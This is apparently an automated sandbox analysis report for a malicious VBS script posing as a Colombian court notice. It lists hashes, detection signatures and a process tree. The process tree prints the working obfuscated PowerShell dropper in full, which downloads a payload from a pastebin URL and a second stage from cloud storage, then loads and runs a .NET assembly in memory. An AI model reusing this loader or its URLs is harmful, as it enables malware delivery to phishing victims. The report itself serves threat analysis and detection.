Overview

overview

10

Static

static

1

INFORMACIO...DF.vbs

windows7-x64

10

INFORMACIO...DF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 15:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INFORMACION RAMA JUDICIAL PROCESO PENAL N0 RADICADO 2024-99659-9900236-999669-PDF.vbs

  • Size

    207KB

  • MD5

    438d60b529450e6976d4eaa1562328d6

  • SHA1

    e77ee5f7c92af0b8ad348515315c7a6eba0e00b6

  • SHA256

    0da4e2f6dea5afb3404219e00ca415c8cef6a5f556a3365be274881e62f3aebd

  • SHA512

    87daca922d36625f5a58d4dc77cb318ec70d000d6f0caf62fc78cf145cb2e46bd9b77f30b389555f23391377894c2e63115e4f8e9ec649fb1c57f7f03c5d3832

  • SSDEEP

    192:+QkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQkQk9:4HFzLPTLgeJOXA9vfTfpfRJaV27

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pastebin.com/raw/0FK5ax2D

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INFORMACION RAMA JUDICIAL PROCESO PENAL N0 RADICADO 2024-99659-9900236-999669-PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★EM★QwBS★Gg★bQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★M★BG★Es★NQBh★Hg★MgBE★Cc★I★★7★CQ★Zg★g★D0★I★★o★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★I★★7★Ek★bgB2★G8★awBl★C0★VwBl★GI★UgBl★HE★dQBl★HM★d★★g★C0★VQBS★Ek★I★★k★EM★QwBS★Gg★bQ★g★C0★TwB1★HQ★RgBp★Gw★ZQ★g★CQ★Zg★g★C0★VQBz★GU★QgBh★HM★aQBj★F★★YQBy★HM★aQBu★Gc★I★★7★GM★bQBk★C4★ZQB4★GU★I★★v★GM★I★★7★H★★aQBu★Gc★I★★x★DI★Nw★u★D★★Lg★w★C4★MQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★u★GU★e★Bl★C★★LQBj★G8★bQBt★GE★bgBk★C★★ew★k★GY★I★★9★C★★K★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★SQBu★HY★bwBr★GU★LQBX★GU★YgBS★GU★cQB1★GU★cwB0★C★★LQBV★FI★SQ★g★CQ★UQBQ★HQ★YQB2★C★★LQBP★HU★d★BG★Gk★b★Bl★C★★J★Bm★C★★LQBV★HM★ZQBC★GE★cwBp★GM★U★Bh★HI★cwBp★G4★ZwB9★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★J★Bv★Gs★dQBo★Hc★I★★9★C★★Jw★w★Cc★I★★7★CQ★YQBw★Hg★c★Bq★C★★PQ★g★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★C★★OwBb★EI★eQB0★GU★WwBd★F0★I★★k★HY★cQBt★GY★dQ★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★FE★U★B0★GE★dg★u★HI★ZQBw★Gw★YQBj★GU★K★★n★CQ★J★★n★Cw★JwBB★Cc★KQ★g★Ck★I★★7★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★OgBD★HU★cgBy★GU★bgB0★EQ★bwBt★GE★aQBu★C4★T★Bv★GE★Z★★o★CQ★dgBx★G0★ZgB1★Ck★LgBH★GU★d★BU★Hk★c★Bl★Cg★JwBU★GU★a★B1★Gw★YwBo★GU★cwBY★Hg★W★B4★Hg★LgBD★Gw★YQBz★HM★MQ★n★Ck★LgBH★GU★d★BN★GU★d★Bo★G8★Z★★o★Cc★TQBz★HE★QgBJ★GI★WQ★n★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★CQ★bgB1★Gw★b★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★JwBk★Dg★NQ★x★GQ★ZQBk★GQ★ZQ★4★DI★O★★t★GE★O★Bh★Dg★LQ★0★DY★Nw★0★C0★Z★Bl★GQ★Ng★t★DU★Mw★1★D★★Zg★0★GY★OQ★9★G4★ZQBr★G8★d★★m★GE★aQBk★GU★bQ★9★HQ★b★Bh★D8★d★B4★HQ★LgBE★EM★R★BD★EQ★QwBE★EM★R★BD★EQ★Rg★y★CU★Z★Bl★HQ★YQB2★Gk★cgBw★D★★Mg★l★GE★Z★Bv★HI★LwBv★C8★bQBv★GM★LgB0★G8★c★Bz★H★★c★Bh★C4★YQ★4★DE★Mw★x★C0★YQBh★HM★bwBv★G8★cgBy★HI★cg★v★GI★Lw★w★HY★LwBt★G8★Yw★u★HM★aQBw★GE★ZQBs★Gc★bwBv★Gc★LgBl★Gc★YQBy★G8★d★Bz★GU★cwBh★GI★ZQBy★Gk★Zg★v★C8★OgBz★H★★d★B0★Gg★Jw★g★Cw★I★★k★GE★c★B4★H★★ag★g★Cw★I★★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★L★★g★CQ★bwBr★HU★a★B3★Cw★I★★n★DE★Jw★s★C★★JwBS★G8★Z★Bh★Cc★I★★p★Ck★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\INFORMACION RAMA JUDICIAL PROCESO PENAL N0 RADICADO 2024-99659-9900236-999669-PDF.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/0FK5ax2D' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$okuhw = '0' ;$apxpj = 'C:\Users\Admin\AppData\Local\Temp\INFORMACION RAMA JUDICIAL PROCESO PENAL N0 RADICADO 2024-99659-9900236-999669-PDF.vbs' ;[Byte[]] $vqmfu = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($vqmfu).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('d851dedde828-a8a8-4674-ded6-5350f4f9=nekot&aidem=tla?txt.DCDCDCDCDCDF2%detavirp02%ador/o/moc.topsppa.a8131-aasooorrrr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $apxpj , '____________________________________________-------', $okuhw, '1', 'Roda' ));"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2692
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2696

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      b0f89050ebffda93a782e51e8ec98d06

      SHA1

      38bbff62e5a67fb69598efdb926e2a505e4a147d

      SHA256

      f676d10e5702d32e693aac36f9c3ebf35faf1dbda651e2403735119b1fef2e88

      SHA512

      7b31439ea5c2d87ce34ddde6bdafd1e0edbe0add9311cc59cc81207d3238f712e589e6349df84ee20573eaa247edf444d69a7e832fdfb0088fcd137b33cf2948

      Download Submit

    • memory/1500-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1500-5-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1500-6-0x000000001B500000-0x000000001B7E2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1500-7-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1500-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1500-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1500-20-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

      Filesize

      9.6MB

      Download